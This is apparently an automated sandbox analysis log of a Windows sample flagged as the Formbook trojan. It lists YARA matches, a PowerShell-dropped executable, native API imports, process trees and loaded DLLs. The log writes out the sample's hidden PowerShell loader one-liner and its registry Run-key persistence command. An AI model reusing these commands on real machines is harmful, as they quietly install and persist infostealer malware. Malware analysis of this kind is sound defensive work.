Source: 00000008.00000002.90700846265.0000000021170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.95003284580.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.95002883111.0000000001370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.95003804450.0000000003A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.95003597330.0000000006160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.94999869480.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Foremasthand.exe

Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215034E0 NtCreateMutant,LdrInitializeThunk,	8_2_215034E0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502B90 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_21502B90
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502D10 NtQuerySystemInformation,LdrInitializeThunk,	8_2_21502D10
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21504260 NtSetContextThread,	8_2_21504260
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21504570 NtSuspendThread,	8_2_21504570
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215029D0 NtWaitForSingleObject,	8_2_215029D0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215029F0 NtReadFile,	8_2_215029F0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215038D0 NtGetContextThread,	8_2_215038D0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502B10 NtAllocateVirtualMemory,	8_2_21502B10
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502B00 NtQueryValueKey,	8_2_21502B00
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502B20 NtQueryInformationProcess,	8_2_21502B20
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502BC0 NtQueryInformationToken,	8_2_21502BC0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502BE0 NtQueryVirtualMemory,	8_2_21502BE0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502B80 NtCreateKey,	8_2_21502B80
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502A10 NtWriteFile,	8_2_21502A10
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502AC0 NtEnumerateValueKey,	8_2_21502AC0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502A80 NtClose,	8_2_21502A80
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502AA0 NtQueryInformationFile,	8_2_21502AA0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502D50 NtWriteVirtualMemory,	8_2_21502D50
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502DC0 NtAdjustPrivilegesToken,	8_2_21502DC0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502DA0 NtReadVirtualMemory,	8_2_21502DA0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502C50 NtUnmapViewOfSection,	8_2_21502C50
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502C10 NtOpenProcess,	8_2_21502C10
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21503C30 NtOpenProcessToken,	8_2_21503C30
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502C30 NtMapViewOfSection,	8_2_21502C30
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502C20 NtSetInformationFile,	8_2_21502C20
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502CD0 NtEnumerateKey,	8_2_21502CD0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502CF0 NtDelayExecution,	8_2_21502CF0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21503C90 NtOpenThread,	8_2_21503C90
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502F00 NtCreateFile,	8_2_21502F00
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502F30 NtOpenDirectoryObject,	8_2_21502F30
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502FB0 NtSetValueKey,	8_2_21502FB0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502E50 NtCreateSection,	8_2_21502E50
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502E00 NtQueueApcThread,	8_2_21502E00
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502ED0 NtResumeThread,	8_2_21502ED0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502EC0 NtQuerySection,	8_2_21502EC0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502E80 NtCreateProcessEx,	8_2_21502E80
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21502EB0 NtProtectVirtualMemory,	8_2_21502EB0

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\2024_04_005.exe

Code function: 3_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

3_2_004036FC

Creates files inside the system directory

Source: C:\Users\user\Desktop\2024_04_005.exe

File created: C:\Windows\resources\0409

Source: C:\Users\user\Desktop\2024_04_005.exe	Code function: 3_2_0040760B	3_2_0040760B
Source: C:\Users\user\Desktop\2024_04_005.exe	Code function: 3_2_00404419	3_2_00404419
Source: C:\Users\user\Desktop\2024_04_005.exe	Code function: 3_2_00406EB5	3_2_00406EB5
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2151717A	8_2_2151717A
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2159010E	8_2_2159010E
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214BF113	8_2_214BF113
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2156D130	8_2_2156D130
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D51C0	8_2_214D51C0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214EB1E0	8_2_214EB1E0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2157E076	8_2_2157E076
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214DB0D0	8_2_214DB0D0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215870F1	8_2_215870F1
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2150508C	8_2_2150508C
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214C00A0	8_2_214C00A0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214DE310	8_2_214DE310
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158F330	8_2_2158F330
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214C1380	8_2_214C1380
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158124C	8_2_2158124C
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214BD2EC	8_2_214BD2EC
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2159A526	8_2_2159A526
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158F5C9	8_2_2158F5C9
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215875C6	8_2_215875C6
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D0445	8_2_214D0445
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21586757	8_2_21586757
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D2760	8_2_214D2760
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214DA760	8_2_214DA760
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2157D646	8_2_2157D646
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214F4670	8_2_214F4670
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214EC600	8_2_214EC600
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2156D62C	8_2_2156D62C
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158A6C0	8_2_2158A6C0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214CC6E0	8_2_214CC6E0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158F6F6	8_2_2158F6F6
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215436EC	8_2_215436EC
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D0680	8_2_214D0680
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215159C0	8_2_215159C0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214CE9A0	8_2_214CE9A0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158E9A6	8_2_2158E9A6
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214B6868	8_2_214B6868
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158F872	8_2_2158F872
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D9870	8_2_214D9870
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214EB870	8_2_214EB870
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D3800	8_2_214D3800
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214FE810	8_2_214FE810
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21570835	8_2_21570835
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215818DA	8_2_215818DA
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D28C0	8_2_214D28C0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215878F3	8_2_215878F3
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214E6882	8_2_214E6882
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_215498B2	8_2_215498B2
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2150DB19	8_2_2150DB19
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D0B10	8_2_214D0B10
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158FB2E	8_2_2158FB2E
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21544BC0	8_2_21544BC0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158EA5B	8_2_2158EA5B
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158CA13	8_2_2158CA13
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158FA89	8_2_2158FA89
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214EFAA0	8_2_214EFAA0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21587D4C	8_2_21587D4C
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D0D69	8_2_214D0D69
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214CAD00	8_2_214CAD00
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158FD27	8_2_2158FD27
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D9DD0	8_2_214D9DD0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2156FDF4	8_2_2156FDF4
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214E2DB0	8_2_214E2DB0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2157EC4C	8_2_2157EC4C
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D3C60	8_2_214D3C60
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21586C69	8_2_21586C69
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158EC60	8_2_2158EC60
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214C0C12	8_2_214C0C12
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214DAC20	8_2_214DAC20
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214E8CDF	8_2_214E8CDF
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214EFCE0	8_2_214EFCE0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2159ACEB	8_2_2159ACEB
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21569C98	8_2_21569C98
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158FF63	8_2_2158FF63
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214DCF00	8_2_214DCF00
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21581FC6	8_2_21581FC6
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D6FE0	8_2_214D6FE0
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_2158EFBF	8_2_2158EFBF
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21512E48	8_2_21512E48
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214F0E50	8_2_214F0E50
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21570E6D	8_2_21570E6D
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21589ED2	8_2_21589ED2
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214C2EE8	8_2_214C2EE8
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_21580EAD	8_2_21580EAD
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214D1EB2	8_2_214D1EB2

Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: String function: 21517BE4 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: String function: 21505050 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: String function: 214BB910 appears 261 times
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: String function: 2154EF10 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: String function: 2153E692 appears 84 times

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1644:304:WilStaging_02

Source: unknown	Process created: C:\Users\user\Desktop\2024_04_005.exe "C:\Users\user\Desktop\2024_04_005.exe"
Source: C:\Users\user\Desktop\2024_04_005.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Gummigeds=Get-Content 'C:\Users\user\AppData\Local\vinduers\languages\Dentinen\Uengageredes.Raa169';$Ensrettendes=$Gummigeds.SubString(26864,3);.$Ensrettendes($Gummigeds)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Foremasthand.exe "C:\Users\user\AppData\Local\Temp\Foremasthand.exe"
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesenterical" /t REG_EXPAND_SZ /d "%Minimisers% -windowstyle minimized $Emissionsspektrernes=(Get-ItemProperty -Path 'HKCU:\Sportily\').Vibse33;%Minimisers% ($Emissionsspektrernes)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesenterical" /t REG_EXPAND_SZ /d "%Minimisers% -windowstyle minimized $Emissionsspektrernes=(Get-ItemProperty -Path 'HKCU:\Sportily\').Vibse33;%Minimisers% ($Emissionsspektrernes)"
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\2024_04_005.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Gummigeds=Get-Content 'C:\Users\user\AppData\Local\vinduers\languages\Dentinen\Uengageredes.Raa169';$Ensrettendes=$Gummigeds.SubString(26864,3);.$Ensrettendes($Gummigeds)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Foremasthand.exe "C:\Users\user\AppData\Local\Temp\Foremasthand.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesenterical" /t REG_EXPAND_SZ /d "%Minimisers% -windowstyle minimized $Emissionsspektrernes=(Get-ItemProperty -Path 'HKCU:\Sportily\').Vibse33;%Minimisers% ($Emissionsspektrernes)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesenterical" /t REG_EXPAND_SZ /d "%Minimisers% -windowstyle minimized $Emissionsspektrernes=(Get-ItemProperty -Path 'HKCU:\Sportily\').Vibse33;%Minimisers% ($Emissionsspektrernes)"	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
